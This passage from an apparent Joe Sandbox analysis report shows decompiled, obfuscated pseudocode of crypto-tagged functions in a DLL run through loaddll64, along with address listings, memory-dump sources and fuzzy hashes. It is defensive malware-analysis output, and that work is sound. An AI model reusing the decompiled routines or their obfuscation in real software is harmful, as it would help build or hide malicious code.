				r14d = r14d - r10d;
				r12d = r15d;
				r15d = r15d | __r9[0x8a];
				r10d = r10d + 0xffffc5a7;
				r12d = r12d ^ __r9[0x86];
				r12d = r12d ^ __r9[0x16];
				r8d = _v88 * 0x30d5;
				_v96 = __r9;
				r9d = r9d * _t222;
				_v104 = __r9[0x74] + 0x37e1;
				_v112 = _t206 + __r9[0x48];
				_v120 = (_t157 ^ r8d) * 0x2032;
				_v128 = r15d;
				_v136 = r11d;
				_v144 = _v72;
				_v152 = r14d;
				_v160 = r10d;
				_v168 = r12d;
				_v176 = r13d;
				_v184 = r14d & 0x000036e7;
				_t162 = E00007FFC7FFC130E1B10(_t248, __rdx, _t260, __rbp, _t274, _t275);
				_t196 = _a40;
				r14d = _t162;
				_t224 = _t245[0x32];
				r15d = _v68;
				r10d = _t245[0x18];
				r10d = r10d - r14d;
				r11d = _t245[0x16];
				r12d = _a72;
				r11d = r11d & 0x0000228c;
				_v88 = _t162;
				r10d = r10d * r12d;
				_t245[0x24] = _t245[0x24] - _t245[0x7e] - 0x27b3;
				_a56 = _a56 ^ _t224 - _t196 - 0x000027b2;
				_a40 = _t196 - 0x1f2c;
				r13d = 0x37b0;
				r9d = r13d;
				r9d = r9d - _t245[0x78];
				r9d = r9d & 0x000027ae;
				r8d = _t245[0xc];
				r8d = r8d & _t245[0x50];
				r12d = r12d ^ 0x000027ae;
				_v96 = _t245;
				_v104 = _t245[0x4c] | 0x00001f2c;
				_v112 = r8d;
				r8d = _v56;
				_v120 = r9d;
				r9d = _v60;
				_v128 = (_t224 | _t245[4]) + 0x228c;
				_v136 = (r14d ^ _a8) + r13d;
				_v144 = r10d;
				_v152 = r11d;
				_v160 = _t245[0x48] - r15d;
				_v168 = (_t245[0x54] | r13d) * r15d;
				_v176 = r12d;
				_v184 = _v64;
				_t171 = E00007FFC7FFC130F8680((_a64 ^ _t245[0x7e]) + 0x2598, _t245, _t245[0x7e] - 0x27b3, __rdx, _t260, _t266, _t267, __r10, __r12, _t273, _t275);
				_v84 = _v84 + 2;
				r10d = _t171;
				_t210 = _a8;
				r11d = _a64;
				_a72 = _t171;
				if (_t234 == 0) goto 0x130e69d6;
				r8d = _v80;
				r9d = _v76;
				r8d = r8d + 4;
				_v80 = r8d;
				if (r8d - (r15d * r14d ^ r14d) >= 0) goto 0x130e6970;
				_t242 = r10d;
				_v48 = _t242;
				if (_t210 == _t242 * _t245[0x54] * _t245[0x40]) goto 0x130e6d24;
				r12d = r14d;
				r12d = r12d | r10d;
				r8d = _t245[0x12];
				r8d = r8d +  *_t245;
				r8d = r8d | 0x00001f2c;
				r9d = r9d - _t245[0x88];
				_v160 = r15d * r14d ^ _a40;
				_v168 = (__r10 - 0x23f6) * r14d;
				_v176 = _t245;
				_v184 = _t245[0x2e] |  *_t245;
				_t174 = E00007FFC7FFC131009D0(r12d, r15d ^ r13d ^ r14d, _t245, _t242 * _t245[0x54] * _t245[0x40], _t255, _t259, _t260, _t261, _t266, _t267, __r11, _t271, _t274, _t275);
				r9d = _v76;
				r13d = _t174;
				if (_t210 + 4 != _v48 * _t245[0x54] * _t245[0x40]) goto 0x130e6cb0;
				goto 0x130e6d2b;
				return _t273 - 0x2f8;
			}


















































                                0x7ffc130e6820
                                0x7ffc130e6820
                                0x7ffc130e6820
                                0x7ffc130e6820
                                0x7ffc130e6820
                                0x7ffc130e6825
                                0x7ffc130e6840
                                0x7ffc130e6847
                                0x7ffc130e684f
                                0x7ffc130e6859
                                0x7ffc130e6861
                                0x7ffc130e6867
                                0x7ffc130e686e
                                0x7ffc130e6875
                                0x7ffc130e687c
                                0x7ffc130e688b
                                0x7ffc130e6893
                                0x7ffc130e689b
                                0x7ffc130e68a1
                                0x7ffc130e68a8
                                0x7ffc130e68af
                                0x7ffc130e68b7
                                0x7ffc130e68be
                                0x7ffc130e68cc
                                0x7ffc130e68ce
                                0x7ffc130e68d8
                                0x7ffc130e68e2
                                0x7ffc130e68f0
                                0x7ffc130e68f9
                                0x7ffc130e6910
                                0x7ffc130e6912
                                0x7ffc130e6928
                                0x7ffc130e692a
                                0x7ffc130e6931
                                0x7ffc130e6942
                                0x7ffc130e694a
                                0x7ffc130e6956
                                0x7ffc130e6959
                                0x7ffc130e6965
                                0x7ffc130e6970
                                0x7ffc130e6972
                                0x7ffc130e6979
                                0x7ffc130e697b
                                0x7ffc130e698d
                                0x7ffc130e69a0
                                0x7ffc130e69ae
                                0x7ffc130e69bc
                                0x7ffc130e69cf
                                0x7ffc130e69d6
                                0x7ffc130e69d9
                                0x7ffc130e69e0
                                0x7ffc130e69e7
                                0x7ffc130e69f5
                                0x7ffc130e69f8
                                0x7ffc130e6a03
                                0x7ffc130e6a0a
                                0x7ffc130e6a0d
                                0x7ffc130e6a14
                                0x7ffc130e6a17
                                0x7ffc130e6a1e
                                0x7ffc130e6a28
                                0x7ffc130e6a2b
                                0x7ffc130e6a32
                                0x7ffc130e6a39
                                0x7ffc130e6a46
                                0x7ffc130e6a50
                                0x7ffc130e6a62
                                0x7ffc130e6a67
                                0x7ffc130e6a7c
                                0x7ffc130e6a87
                                0x7ffc130e6a8b
                                0x7ffc130e6a8f
                                0x7ffc130e6a94
                                0x7ffc130e6a99
                                0x7ffc130e6a9d
                                0x7ffc130e6aa2
                                0x7ffc130e6aa7
                                0x7ffc130e6aac
                                0x7ffc130e6ab1
                                0x7ffc130e6ab5
                                0x7ffc130e6aba
                                0x7ffc130e6ac1
                                0x7ffc130e6ac4
                                0x7ffc130e6aca
                                0x7ffc130e6adf
                                0x7ffc130e6ae9
                                0x7ffc130e6aec
                                0x7ffc130e6af3
                                0x7ffc130e6afb
                                0x7ffc130e6b02
                                0x7ffc130e6b0e
                                0x7ffc130e6b1a
                                0x7ffc130e6b33
                                0x7ffc130e6b55
                                0x7ffc130e6b5c
                                0x7ffc130e6b66
                                0x7ffc130e6b6d
                                0x7ffc130e6b7a
                                0x7ffc130e6b81
                                0x7ffc130e6b8a
                                0x7ffc130e6b9b
                                0x7ffc130e6ba2
                                0x7ffc130e6baa
                                0x7ffc130e6bb5
                                0x7ffc130e6bba
                                0x7ffc130e6bc2
                                0x7ffc130e6bc7
                                0x7ffc130e6bcf
                                0x7ffc130e6bd3
                                0x7ffc130e6bde
                                0x7ffc130e6be3
                                0x7ffc130e6be8
                                0x7ffc130e6bec
                                0x7ffc130e6bf0
                                0x7ffc130e6bf5
                                0x7ffc130e6bf9
                                0x7ffc130e6bfe
                                0x7ffc130e6c06
                                0x7ffc130e6c09
                                0x7ffc130e6c15
                                0x7ffc130e6c2b
                                0x7ffc130e6c32
                                0x7ffc130e6c38
                                0x7ffc130e6c40
                                0x7ffc130e6c48
                                0x7ffc130e6c53
                                0x7ffc130e6c61
                                0x7ffc130e6c67
                                0x7ffc130e6c6d
                                0x7ffc130e6c8b
                                0x7ffc130e6c9f
                                0x7ffc130e6cad
                                0x7ffc130e6cb0
                                0x7ffc130e6cc0
                                0x7ffc130e6cc8
                                0x7ffc130e6ccf
                                0x7ffc130e6cd9
                                0x7ffc130e6cdd
                                0x7ffc130e6ce1
                                0x7ffc130e6ce6
                                0x7ffc130e6cea
                                0x7ffc130e6d02
                                0x7ffc130e6d0a
                                0x7ffc130e6d1b
                                0x7ffc130e6d22
                                0x7ffc130e6d4e

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ec31a42c203a2aa718200237ebeba28935719d637934978fc03d1ef27e967e0
                                • Instruction ID: bdaa46946065e6f22a6f2efa6e7ae3414611c21df0595d47a13ced32d73b366f
                                • Opcode Fuzzy Hash: 1ec31a42c203a2aa718200237ebeba28935719d637934978fc03d1ef27e967e0
                                • Instruction Fuzzy Hash: D2D187B76182C58BD325CF25E44579ABBA4F388B98F044039DF8997B98DB38E954CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130FF290 Relevance: .2, Instructions: 221COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 98%
                                			E00007FFC7FFC130FF290(signed int __ecx, signed int __edx, long long __rbx, long long __rdi, signed int __r8, signed int __r9, signed int _a8, signed int _a16, long long _a24, long long _a40, signed int _a48, signed long long _a56, signed int _a64, signed int _a72, intOrPtr _a80, intOrPtr _a88) {
				long long _v56;
				void* _t154;
				void* _t157;
				intOrPtr* _t160;
				long long _t162;
				long long _t165;
				signed long long _t173;
				signed long long _t188;
				signed long long _t198;
				signed long long _t211;
				signed long long _t220;
				long long _t226;
				signed long long _t229;
				void* _t232;
				signed long long _t236;
				signed long long _t242;
				signed long long _t243;
				signed int _t244;
				signed long long _t246;

				_a8 = __ecx;
				_t160 = _a40;
				r14d = r8w & 0xffffffff;
				r10d = _a64;
				r11d = 0;
				r15d = __edx & 0x0000ffff;
				_t165 =  *((intOrPtr*)(_t160 + 0x158));
				r12d = __ecx;
				_a16 = __ecx;
				 *(_t160 + 0x110) =  *(_t160 + 0x110) - ( *(_t160 + 0xc8) | _t246);
				 *(_t232 - 0x18) = _t246;
				r8d =  *( *((intOrPtr*)(_t160 + 0x1a0)) + 0x130);
				_t211 = _a56;
				r8d = r8d - 0x23f7;
				_t244 = r8d;
				if (_t244 - _t211 >= 0) goto 0x130ff685;
				r9d = _a48;
				_a24 = __rbx;
				_t162 = _t165;
				_v56 = __rdi;
				_t226 = _t165;
				_a40 = _t165;
				asm("o16 nop [eax+eax]");
				r8d =  *(_t160 + 0x150);
				_t236 = __r8 ^ 0x0000151e;
				if (_t236 - _t211 < 0) goto 0x130ff366;
				r9d = __ecx;
				_t242 = __r9 ^ _t211;
				if (0x36e8 - _t236 <= 0) goto 0x130ff350;
				 *(_t160 + 0x198) = _t242;
				r9d = _a48;
				 *((intOrPtr*)(_t160 + 0x70)) =  *((intOrPtr*)(_t160 + 0x70)) + 0xffffd84e - _t246;
				r8d =  *(_a88 + _t244) & 0x000000ff;
				r8b = r8b - _a80;
				r8b = r8b ^ _a72;
				 *( *((intOrPtr*)(_t160 + 0x50)) + _t162 + _t244) = r8b;
				if (r10d == 8) goto 0x130ff636;
				r15d =  *( *((intOrPtr*)(_t160 + 0x50)) + _t162 + _t244) & 0x000000ff;
				 *(_t160 + 0x1f0) =  *(_t160 + 0x1f0) ^  *(_t160 + 0x20) * 0x000027ae;
				r15b = r15b & (0x00000001 << r10d) - 0x00000001;
				if ( *(_t160 + 0xc8) -  *(_t160 + 0x18) <= 0) goto 0x130ff3f2;
				 *( *((intOrPtr*)(_t160 + 0x30)) + 0x1e0) =  *(_t160 + 0x230) ^ __r9;
				_t173 =  *((intOrPtr*)(_t160 + 0x40));
				if (( *(_t173 + 0xb0) ^ 0x00001052) - 0x37e1 > 0) goto 0x130ff41f;
				 *(_t160 + 0x198) =  *(_t160 + 0x198) + _t173 * 0x125d;
				 *(_t160 + 0x198) =  *(_t160 + 0x198) + 0xffffd84e - _t242;
				if (r10d == 0) goto 0x130ff5f8;
				r10d = r15b & 0xffffffff;
				r10b = r10b >> _t162 - 1;
				r10b = r10b & ( *( *((intOrPtr*)(_t160 + 0x1c8)) + 0x188) & 0x000000ff ^ 0x00000032);
				 *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x30)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x30)) + 0x198)) + (_t229 | __r9);
				if ( *(_t160 + 0x150) == 0x23f6) goto 0x130ff495;
				 *( *((intOrPtr*)(_t160 + 0x30)) + 0xc8) =  *( *((intOrPtr*)(_t160 + 0x30)) + 0xc8) ^  *( *_t160 + 0xe0);
				 *( *_t160 + 0xe0) =  *( *_t160 + 0xe0) + 1;
				r8d =  *( *((intOrPtr*)(_t160 + 0x30)) + 0x130) * 0x582b602f;
				_t154 = r8d - 0x3a5a;
				if (_t154 > 0) goto 0x130ff4d9;
				r9d = r14w & 0xffffffff;
				_t243 = _t242 + 0x36e7;
				r8d = 0x3a5b - r8d;
				if (_t154 != 0) goto 0x130ff4c7;
				r9d = _a48;
				 *(_t160 + 0x18) =  *(_t160 + 0x18) | _t243;
				r11d = r11d + 1;
				if (r11d == 0) goto 0x130ff533;
				 *(_t160 + 0xc8) =  *(_t160 + 0x1d0) ^ __r9;
				_t220 =  *((intOrPtr*)(_t160 + 0x50));
				 *(_t220 + _t226) = ( *(_t220 + _t226) & 0x000000ff) + ( *(_t220 + _t226) & 0x000000ff) | r10b;
				if (( *( *((intOrPtr*)(_t160 + 0x140)) + 0x130) ^ 0x0000066f) != 0x37e1) goto 0x130ff56c;
				 *(_t160 + 0x100) =  *(_t160 + 0x10) ^ 0x000027ae;
				goto 0x130ff56c;
				 *(_t160 + 0x198) =  *((intOrPtr*)(_t160 + 0xe8)) + 0x3a59;
				_t188 =  *((intOrPtr*)(_t160 + 0x50));
				 *(_t226 + _t188) = r10b;
				 *(_t160 + 0x110) =  *(_t160 + 0x110) + (_t188 | __r9);
				 *((intOrPtr*)(_t160 + 0x48)) =  *((intOrPtr*)(_t160 + 0x48)) -  *(_t160 + 0xa0) + __r9;
				 *(_t160 + 0x1f0) =  *(_t160 + 0x1f0) +  *(_t160 + 0xa0) - 0x3a59;
				_t157 = r11d - (_t220 ^ 0x00003295);
				if (_t157 != 0) goto 0x130ff5e3;
				r12d = r12d + 1;
				 *((long long*)(_t160 + 0x80)) = 0x33ff;
				r11d =  *( *((intOrPtr*)(_t160 + 0x1c8)) + 0x130);
				r11d = r11d ^ 0x000023f7;
				_t198 =  *((intOrPtr*)(_t160 + 0x1c0)) + 0x110;
				 *(_t160 + 0x228) = _t198;
				 *(_t160 + 0xa0) = _t198 ^ _t243;
				if (_t157 != 0) goto 0x130ff440;
				r10d = _a64;
				 *(_t160 + 0x100) =  *(_t160 + 0x100) * ( *(_t160 + 0x110) | 0x00002032);
				 *((intOrPtr*)(_t160 + 0x1e0)) =  *((intOrPtr*)(_t160 + 0x1e0)) +  *((intOrPtr*)(_t160 + 0x1b8)) + 0x228c;
				 *(_t160 + 0x198) =  *(_t160 + 0x198) + ( *(_t160 + 0xc8) | _t243);
				 *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x1c0)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x1c0)) + 0x198)) +  *((intOrPtr*)(_t160 + 0x218));
				 *((long long*)(_t160 + 0x218)) =  *((long long*)(_t160 + 0x218)) - 1;
				if (_t244 + 1 - _a56 < 0) goto 0x130ff330;
				r12d =  ==  ? _a16 + _a56 : r12d;
				return r12d;
			}






















                                0x7ffc130ff290
                                0x7ffc130ff2a2
                                0x7ffc130ff2a7
                                0x7ffc130ff2ab
                                0x7ffc130ff2b3
                                0x7ffc130ff2b6
                                0x7ffc130ff2bf
                                0x7ffc130ff2cd
                                0x7ffc130ff2d3
                                0x7ffc130ff2d7
                                0x7ffc130ff2e5
                                0x7ffc130ff2e9
                                0x7ffc130ff2f0
                                0x7ffc130ff2f8
                                0x7ffc130ff2ff
                                0x7ffc130ff305
                                0x7ffc130ff30b
                                0x7ffc130ff310
                                0x7ffc130ff315
                                0x7ffc130ff318
                                0x7ffc130ff31d
                                0x7ffc130ff320
                                0x7ffc130ff325
                                0x7ffc130ff330
                                0x7ffc130ff33c
                                0x7ffc130ff346
                                0x7ffc130ff348
                                0x7ffc130ff34b
                                0x7ffc130ff358
                                0x7ffc130ff35a
                                0x7ffc130ff361
                                0x7ffc130ff370
                                0x7ffc130ff383
                                0x7ffc130ff388
                                0x7ffc130ff390
                                0x7ffc130ff398
                                0x7ffc130ff3a0
                                0x7ffc130ff3bf
                                0x7ffc130ff3c6
                                0x7ffc130ff3cd
                                0x7ffc130ff3db
                                0x7ffc130ff3eb
                                0x7ffc130ff3f2
                                0x7ffc130ff408
                                0x7ffc130ff418
                                0x7ffc130ff42c
                                0x7ffc130ff436
                                0x7ffc130ff443
                                0x7ffc130ff447
                                0x7ffc130ff45f
                                0x7ffc130ff462
                                0x7ffc130ff474
                                0x7ffc130ff484
                                0x7ffc130ff48e
                                0x7ffc130ff499
                                0x7ffc130ff4a4
                                0x7ffc130ff4ab
                                0x7ffc130ff4b6
                                0x7ffc130ff4ba
                                0x7ffc130ff4c4
                                0x7ffc130ff4ce
                                0x7ffc130ff4d0
                                0x7ffc130ff4d5
                                0x7ffc130ff4dc
                                0x7ffc130ff4e1
                                0x7ffc130ff4ed
                                0x7ffc130ff4f4
                                0x7ffc130ff501
                                0x7ffc130ff51d
                                0x7ffc130ff52a
                                0x7ffc130ff531
                                0x7ffc130ff541
                                0x7ffc130ff548
                                0x7ffc130ff54c
                                0x7ffc130ff557
                                0x7ffc130ff568
                                0x7ffc130ff57a
                                0x7ffc130ff595
                                0x7ffc130ff598
                                0x7ffc130ff5a1
                                0x7ffc130ff5a4
                                0x7ffc130ff5b2
                                0x7ffc130ff5c0
                                0x7ffc130ff5c7
                                0x7ffc130ff5ce
                                0x7ffc130ff5dc
                                0x7ffc130ff5e6
                                0x7ffc130ff5ec
                                0x7ffc130ff61a
                                0x7ffc130ff62f
                                0x7ffc130ff64a
                                0x7ffc130ff658
                                0x7ffc130ff65f
                                0x7ffc130ff671
                                0x7ffc130ff690
                                0x7ffc130ff6a5

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9d4ac3d9a9c46076188db0bcfc194ca47d344c2568f07f4fddbe795ed10baa4
                                • Instruction ID: 8ca8fdda2c32bd46c3a4bedef7127ff3fad0931b0435598f8ea2e4e4ef044b06
                                • Opcode Fuzzy Hash: e9d4ac3d9a9c46076188db0bcfc194ca47d344c2568f07f4fddbe795ed10baa4
                                • Instruction Fuzzy Hash: 87A19B72608A9482EB15CB15E8A43BA7BE9F7C8B94F0A81B5DF8E47794CF38C055C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E1B10 Relevance: .2, Instructions: 200COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 35%
                                			E00007FFC7FFC130E1B10(void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r14, long long __r15, long long _a8, long long _a16, long long _a24, signed int _a32, signed int _a64, signed int _a72, signed int _a80, long long _a128) {
				long long _v40;
				signed int _v56;
				signed int _v64;
				signed int _v72;
				long long _v80;
				intOrPtr _v88;
				signed int _v96;
				signed int _v104;
				signed int _v112;
				signed int _v120;
				signed int _v128;
				signed int _v136;
				void* __rbx;
				signed int _t140;
				signed int _t153;
				signed int _t172;
				void* _t180;
				void* _t185;
				void* _t190;
				intOrPtr _t206;
				signed long long _t213;
				long long _t215;
				signed long long _t219;
				signed long long _t225;
				intOrPtr _t228;
				void* _t231;
				intOrPtr _t241;
				void* _t242;
				void* _t243;

				_a32 = r9d;
				r12d = _a80;
				r10d = __rcx + 0xd1;
				r13d = _a72;
				r12d = r12d + 0xffffed95;
				_t215 = _a128;
				r13d = r13d + 0xb4;
				r9d = __rdx - 0x23f6;
				_t172 = __rdx + 0x119f;
				_a32 = _t172;
				if (r9d - __rcx - 0x119f > 0) goto 0x130e1ed4;
				if (r9d - _t243 - 0x1086 > 0) goto 0x130e1d7a;
				r11d = 0;
				if ( *((intOrPtr*)(_t215 + 0x270)) - r11d <= 0) goto 0x130e1d59;
				if ( *((long long*)(_t215 + 0x70)) - 0x228c > 0) goto 0x130e1bbc;
				 *( *(_t215 + 0x1c0) + 0x1b0) =  *( *(_t215 + 0x1c0) + 0x1b0) ^ 0x00005b5c;
				r10d = 0;
				_t185 =  *((intOrPtr*)(_t215 + 0x274)) - r10d;
				if (_t185 <= 0) goto 0x130e1ccb;
				 *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x278) * 4) =  *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x278) * 4) ^  *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x27c) * 4);
				if (_t185 >= 0) goto 0x130e1c03;
				_t228 =  *((intOrPtr*)(_t215 + 0x210));
				r8d =  *(_t228 +  *(_t215 + 0x278) * 4);
				if ((( *(_t215 + 0x28c) & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 == 0) goto 0x130e1c1c;
				asm("inc ecx");
				 *((intOrPtr*)(_t228 +  *(_t215 + 0x27c) * 4)) =  *((intOrPtr*)(_t228 +  *(_t215 + 0x27c) * 4)) + r8d;
				if ( *((long long*)(_t215 + 0x220)) != 0x27b2) goto 0x130e1c4e;
				_t219 =  *(_t215 + 0x218) ^ 0x0000329d;
				 *(_t215 + 0x10) =  *(_t215 + 0x10) * _t219;
				_t241 =  *((intOrPtr*)(_t215 + 0x1a0));
				if ( *(_t241 + 0x188) * 0xd50c7428 - 0x23f6 < 0) goto 0x130e1c93;
				 *(_t215 + 0x198) =  *(_t215 + 0x100) ^ 0x00002103;
				if (0x23f7 - _t219 <= 0) goto 0x130e1c77;
				r10d = r10d + 1;
				_t153 =  *(_t215 + 0x238);
				asm("cdq");
				 *(_t215 + 0x278) = ( *(_t215 + 0x278) + 1) % _t153;
				asm("cdq");
				 *(_t215 + 0x27c) = ( *(_t215 + 0x27c) + 1) % _t153;
				_t190 = r10d -  *((intOrPtr*)(_t215 + 0x274));
				if (_t190 < 0) goto 0x130e1bd0;
				 *(_t215 + 0x58) =  *(_t215 + 0x48) * 0x3666;
				 *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x278) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x278) * 4)) +  *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x27c) * 4);
				if (_t190 >= 0) goto 0x130e1d11;
				_t206 =  *((intOrPtr*)(_t215 + 0x210));
				if ((( *(_t215 + 0x288) & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 == 0) goto 0x130e1d2c;
				r8d =  *(_t206 +  *(_t215 + 0x278) * 4);
				asm("inc ecx");
				goto 0x130e1d37;
				r8d =  *(_t206 +  *(_t215 + 0x278) * 4);
				r11d = r11d + 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x27c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x27c) * 4)) + r8d;
				if (r11d -  *((intOrPtr*)(_t215 + 0x270)) < 0) goto 0x130e1ba0;
				_t225 =  *((intOrPtr*)( *(_t215 + 0x1c0) + 0x1b8)) - 0x2103;
				 *(_t215 + 0x198) = _t225;
				goto 0x130e1ed4;
				if ( *(_t215 + 0x100) - r9d +  *(_t215 + 0x188) <= 0) goto 0x130e1ed4;
				_t140 =  *(_t215 + 0x100);
				r10d = r10d & r9d;
				r8d =  *(_t215 + 0x188);
				_a8 = __rbp;
				_a64 = r10d;
				r10d =  *(_t215 + 0x130);
				r10d = r10d & _t140;
				_a16 = __rsi;
				r10d = r10d - 0x2598;
				r9d =  *(_t215 + 0xe0);
				_a24 = __r14;
				r14d =  *(_t215 + 0x120);
				r11d = r12d * 0x3666;
				r14d = r14d | r12d;
				_v40 = __r15;
				r14d = r14d + r8d;
				r15d =  *(_t215 + 0x90);
				r9d = r9d | 0x00001f2c;
				r9d = r9d ^  *(_t215 + 0x78);
				r15d = r15d & 0x00001a58;
				r15d = r15d | 0x00002001;
				r12d = r12d | 0x000027b2;
				_v56 = r15d;
				r11d = r11d ^ _t140;
				_v64 = r14d;
				_v72 = r13d & 0x00002598;
				_v80 = _t215;
				r8d = r8d - _t172;
				_v88 = _t225 + _t241;
				_v96 =  *(_t215 + 0x48) * r9d;
				_v104 = _a64;
				_v112 = r11d;
				_v120 = r10d;
				_v128 =  *((intOrPtr*)(_t215 + 0xb0)) + 0x00001f2c | r8d;
				_v136 = r12d;
				E00007FFC7FFC130FED60(( *(_t215 + 0x1c0) | 0x000036e7) -  *((intOrPtr*)(_t215 + 0x1b8)),  *(_t215 + 0xe0) ^ r13d ^ _t172, _t180, r9d +  *(_t215 + 0x188), _t215, _t225,  *(_t215 + 0x278),  *(_t215 + 0x100) ^ 0x00002103, _t241, _t242);
				 *((intOrPtr*)(_t215 + 0x200)) =  *((intOrPtr*)(_t215 + 0x200)) + (r13d ^ 0x0000343a);
				 *((intOrPtr*)(_t215 + 0x270)) = 0x73ba78;
				 *((intOrPtr*)(_t215 + 0x274)) = 0x6a;
				_t213 =  *((intOrPtr*)(_t215 + 0xc8));
				 *(_t215 + 0x1b0) =  *(_t215 + 0x1b0) | _t213;
				 *((long long*)(_t215 + 0xc8)) = _t213 - 1;
				return _t231 + 0x24c;
			}
































                                0x7ffc130e1b10
                                0x7ffc130e1b2f
                                0x7ffc130e1b37
                                0x7ffc130e1b3e
                                0x7ffc130e1b46
                                0x7ffc130e1b4d
                                0x7ffc130e1b55
                                0x7ffc130e1b5c
                                0x7ffc130e1b63
                                0x7ffc130e1b69
                                0x7ffc130e1b73
                                0x7ffc130e1b83
                                0x7ffc130e1b89
                                0x7ffc130e1b93
                                0x7ffc130e1ba8
                                0x7ffc130e1bb1
                                0x7ffc130e1bbc
                                0x7ffc130e1bbf
                                0x7ffc130e1bc6
                                0x7ffc130e1bec
                                0x7ffc130e1bfa
                                0x7ffc130e1c03
                                0x7ffc130e1c11
                                0x7ffc130e1c17
                                0x7ffc130e1c19
                                0x7ffc130e1c23
                                0x7ffc130e1c32
                                0x7ffc130e1c3f
                                0x7ffc130e1c4a
                                0x7ffc130e1c4e
                                0x7ffc130e1c67
                                0x7ffc130e1c79
                                0x7ffc130e1c91
                                0x7ffc130e1c99
                                0x7ffc130e1c9c
                                0x7ffc130e1ca4
                                0x7ffc130e1caf
                                0x7ffc130e1cb5
                                0x7ffc130e1cb8
                                0x7ffc130e1cbe
                                0x7ffc130e1cc5
                                0x7ffc130e1cd3
                                0x7ffc130e1cfa
                                0x7ffc130e1d08
                                0x7ffc130e1d11
                                0x7ffc130e1d1a
                                0x7ffc130e1d23
                                0x7ffc130e1d27
                                0x7ffc130e1d2a
                                0x7ffc130e1d33
                                0x7ffc130e1d3e
                                0x7ffc130e1d48
                                0x7ffc130e1d53
                                0x7ffc130e1d67
                                0x7ffc130e1d6e
                                0x7ffc130e1d75
                                0x7ffc130e1d8b
                                0x7ffc130e1d91
                                0x7ffc130e1d97
                                0x7ffc130e1d9a
                                0x7ffc130e1da9
                                0x7ffc130e1db4
                                0x7ffc130e1dc2
                                0x7ffc130e1dcd
                                0x7ffc130e1dd0
                                0x7ffc130e1ddb
                                0x7ffc130e1de6
                                0x7ffc130e1de9
                                0x7ffc130e1df4
                                0x7ffc130e1dfd
                                0x7ffc130e1e04
                                0x7ffc130e1e07
                                0x7ffc130e1e0f
                                0x7ffc130e1e12
                                0x7ffc130e1e19
                                0x7ffc130e1e20
                                0x7ffc130e1e24
                                0x7ffc130e1e2b
                                0x7ffc130e1e32
                                0x7ffc130e1e39
                                0x7ffc130e1e3e
                                0x7ffc130e1e47
                                0x7ffc130e1e51
                                0x7ffc130e1e58
                                0x7ffc130e1e5d
                                0x7ffc130e1e66
                                0x7ffc130e1e7d
                                0x7ffc130e1e81
                                0x7ffc130e1e85
                                0x7ffc130e1e8a
                                0x7ffc130e1e8f
                                0x7ffc130e1e93
                                0x7ffc130e1e98
                                0x7ffc130e1ecd
                                0x7ffc130e1ed4
                                0x7ffc130e1ede
                                0x7ffc130e1ee8
                                0x7ffc130e1eef
                                0x7ffc130e1ef9
                                0x7ffc130e1f13

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
